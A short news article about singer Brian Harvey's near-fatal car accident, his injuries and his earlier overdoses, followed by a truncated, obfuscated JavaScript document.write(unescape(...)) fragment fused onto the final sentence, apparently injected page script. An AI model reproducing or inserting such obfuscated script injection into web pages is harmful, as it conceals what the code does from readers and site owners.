Pop star Brian Harvey has revealed how he may never walk again following a car accident that shattered his pelvis.
The former East 17 singer and one-time contestant on I'm a Celebrity Get Me Out of Here told how he was left fighting for his life after he was crushed under the wheels of his own Mercedes.
But he insisted that he had not been trying to kill himself, despite attempting to commit suicide on two occasions in the weeks leading up to the incident.
In an interview with the News of the World, Harvey said he was recovering with the help of girlfriend Emma B, saying: "I've been suffering from depression and I had taken two overdoses in the weeks before the accident. But that's not what this was.
"It's almost like someone said: 'OK you've lost respect for your life, now you're going to find out what it's like to really fight for your life.'
"I really shouldn't be alive. I may never be able to walk again. I can move my legs but I can't put any weight on them because the pelvis was so badly smashed.
"I'm hoping I will be able to walk again but I know it will take intense physio."
He told the newspaper that the accident happened when he was driving along and started to feel sick. He opened the door but as he tried to put his foot on the brake, he hit the accelerator instead.
The car went into reverse and hit another vehicle - the impact of which forced him out of the car and underneath it.
The 30-year-old singer went into a coma following the accident in June and had to undergo two major operations.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
